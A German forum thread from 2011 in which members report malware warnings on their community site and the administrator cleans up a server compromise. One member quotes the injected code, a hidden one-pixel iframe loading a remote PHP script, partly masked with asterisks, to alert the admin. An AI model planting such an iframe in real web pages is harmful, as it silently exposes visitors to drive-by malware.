Author Topic: viren?  (Read 17699 times)

Offline Gast

• Plague Rat
viren?
« Reply #15 on: May 05, 2011, 09:34:43 pm »
Warnung: Irgendetwas stimmt hier nicht!
forum.areyousuffering.de enthält Inhalte von www.areyousuffering.de, einer Website, die bekanntermaßen Malware enthält. Ihr Computer fängt sich möglicherweise einen Virus ein, wenn Sie diese Website besuchen.
Google hat schädliche Software gefunden, die möglicherweise auf Ihrem Computer installiert wird, wenn Sie fortfahren. Wenn Sie diese Website bereits in der Vergangenheit besucht haben oder dieser Website vertrauen, ist es möglich, dass sie vor Kurzem von einem Hacker manipuliert wurde. Sie sollten daher nicht fortfahren und den Vorgang vielleicht morgen wiederholen oder eine andere Website aufrufen.
Wir haben www.areyousuffering.de bereits informiert, dass wir Malware auf der Website gefunden haben. Weitere Informationen zu den Problemen auf www.areyousuffering.de erhalten Sie auf der Google-SafeBrowsing Diagnoseseite.

Wenn Sie zur Kenntnis nehmen, dass diese Website Ihrem Computer schaden kann, Trotzdem fortfahren.

Unterstützen Sie uns dabei, Malware zu erkennen, indem Sie uns zusätzliche Informationen zu Websites senden, auf denen diese Warnung erscheint. Diese Daten werden gemäß Datenschutzrichtlinien von Safe Browsing gehandhabt.

Naja, soviel zu dem Thema ....

„Nur wenige Menschen sind klug genug, hilfreichen Tadel nichtssagendem Lob vorzuziehen.“
François de La Rochefoucauld

Offline Nachtschimmer

• Plague Rat
viren?
« Reply #16 on: May 05, 2011, 09:54:19 pm »
Jap, ich hab erst von Antivir 18 und dann 20Viren angezeigt bekommen auf der Seite und dann nochmal eine Malware von Ad Aware.
Bis hin zu einem Boot Etwas, was glücklicherweise erkannt wurde, aber es hat mich trotzdem geschreckt, als beim Booten ein Boot Cleaner eingeblendet wurde  :meh:

Daher geh ich nur mehr über das Forum, was hoffentlich noch nicht verseucht wurde?

Offline Sh|va

• The Pirate Cap'n
  • Plague Rat
viren?
« Reply #17 on: May 05, 2011, 10:35:36 pm »
Also ich krieg die Meldung von Gast da oben auch seit heute morgen, im Forum. Allerdings wird das ganze vom Browser gemeldet. Das muss allerdings nichts bedeuten, kann es natürlich aber. bei Egg Cave kam so eine Meldung auch eine ganze Weile, weil der eine bestimmte Werbeanzeige als Malware angesehen hat, die aber gar keine war, wie sich herausstellte.

Da wäre es mal an Rayk, da Licht ins Dunkel zu bringen ... wo ist der eigentlich hin verschwunden?

Offline Schneewittchen

• Anti-Heldin
  • Inmate
  • Dreams, they're for those who sleep.
viren?
« Reply #18 on: May 05, 2011, 11:38:36 pm »
Malware Warning

Visiting this page may be harmful. It has been reported for distributing malicious software.

Opera Software strongly discourages visiting this page.Go Back Safely
Why was this page blocked? Ignore this warning
„Sylvia, get your head out of the oven."

Offline Rayk

• Administrator
  • Inmate
    • Are You Suffering?
viren?
« Reply #19 on: May 06, 2011, 04:03:36 pm »
Ja, scheint als hätte sich da irgendwer über irgendeine Sicherheitslücke in die Hauptseite - nicht das Forum - eingeschlichen. Hauptseite ist deshalb erstmal weg. Bilder auch. Kommen aber wieder.

Offline Metaphor

• Tentakeltier
  • Inmate
  • Moment capture, long-term exposure.
    • This isn't music, and we're not a band.
viren?
« Reply #20 on: May 06, 2011, 06:17:44 pm »
,..Und haben die die Textur mitgenommen? Dann ist meine Frage beantwortet. <.<'
*High Five mit allen verfügbaren mehrgliedrigen Extremitäten*
der user über mir malt gerne bilder von kätzchen die kuscheln

Offline Z.innherz

• Music Addict
  • Plague Rat
  • Meduser!
    • Ich blogge! Mwahahaa~!
viren?
« Reply #21 on: May 08, 2011, 12:49:57 am »
Inmates! Man hat unsere Anstalt infiltriert! *Party-Helme verteil*
Wir muessen zurueckschiessen! D: Holt die Muffins vom letzten Jahr raus und fuellt damit die gepunkteten Kanonen! Backt Salzteiggeschosse! Schnappt euch ein Kissen als Schild von unserer Kissenburg! Verschliesst die Zellen! Die von Frauen und Kindern zu erst! Oh wait... WELL! Holt eure Pillenschleudern! Niemand uebernimmt so einfach diese Anstalt!

THIS.
IS.
ASYLUM!!
*Virus in Loch tret und groehlend wegrenn*

(Man goenne mir den Spass... ^^)
Schneewittchen: Ich find' dich so geil.Doomsday Penguin <- Update am 29.10.2011!

Offline Poppie

• Frl. Arschloch - cocky by nature
  • Beyond Remedy
  • If you're happy and you know it, slit your wrists
    • Klick mich, ich bin ein verwunschenes Schokoladentaefelchen.
viren?
« Reply #22 on: May 08, 2011, 02:08:45 am »
Party-Helme *losgröhl* :lol:
Meds or Madness?

Offline Lestaire

• Ankh-Fetischistin
  • Plague Rat
  • Black is the sanctuary of light.
    • tumblöör
viren?
« Reply #23 on: May 08, 2011, 03:44:00 pm »
zinnherz, du bist schuld, dass ich seit 5 minuten nicht mehr mit dem lachen aufhören kann :D

Offline Gast

• Plague Rat
viren? iframe/Malware
« Reply #24 on: May 14, 2011, 10:18:25 am »
Ja, scheint als hätte sich da irgendwer über irgendeine Sicherheitslücke in die Hauptseite - nicht das Forum - eingeschlichen. Hauptseite ist deshalb erstmal weg. Bilder auch. Kommen aber wieder.
Problem nicht gelöst (habs mit *** entschärft):
Code: [Select]
<iframe src="http://fs8g***8dduf.com/puke.de/jnbn***ioeoctgljvb.php" width="1" height="1" frameborder="0"></iframe>Räum mal deinen Server komplett auf!

„Nur wenige Menschen sind klug genug, hilfreichen Tadel nichtssagendem Lob vorzuziehen.“

Offline Rayk

• Administrator
  • Inmate
    • Are You Suffering?
viren?
« Reply #25 on: May 16, 2011, 05:56:59 am »
Naja, wo hast Du das gefunden? Wieder auf der Hauptseite? Das war schon sauber, ist aber fleißig zurückgekehrt. Entweder ist's ein Problem auf Seiten des Providers oder es hat mit irgendwelchen alten Passwörtern, die noch dazwischenhängen, zu tun. Habe jetzt 'nen zweiten Anlauf gestartet.

Offline Gast

• Plague Rat
viren?
« Reply #26 on: May 16, 2011, 10:25:29 pm »
War auf der Startseite. Solltest auch mal checken, ob dir nicht mittlerweile ein Script untergejubelt wurde (viel Spaß beim Suchen ...) - dann wäre neu aufsetzen und wieder Datenbank einspielen das sicherste. Oder du bist masochistisch veranlagt - dann gehts halt mit Malware & Spam so weiter.

Offline Rayk

• Administrator
  • Inmate
    • Are You Suffering?
viren?
« Reply #27 on: May 18, 2011, 10:49:54 pm »
Den Server habe ich schon komplett gereinigt und neu beladen. Hatte allerdings - ja, man darf lachen - beim ersten mal verpennt, mein Passwort zu ändern. Hoffe, dass es daran lag. Sonst bleibt tatsächlich nicht viel mehr übrig, als auch die ganze Datenbank plattzumachen, ja.

Offline Poppie

• Frl. Arschloch - cocky by nature
  • Beyond Remedy
  • If you're happy and you know it, slit your wrists
    • Klick mich, ich bin ein verwunschenes Schokoladentaefelchen.
viren?
« Reply #28 on: May 19, 2011, 01:06:23 am »
Hoffentlich fruchtete es nun :S
Meds or Madness?

Offline Gast

• Plague Rat
viren?
« Reply #29 on: May 21, 2011, 12:20:40 pm »
Die Spammer sind uns ja glücklicherweise erhalten geblieben - kann man ja auch als inhaltliche Bereicherung ansehen; vier neue Beiträge in so kurzer Zeit von Lily87l7rr!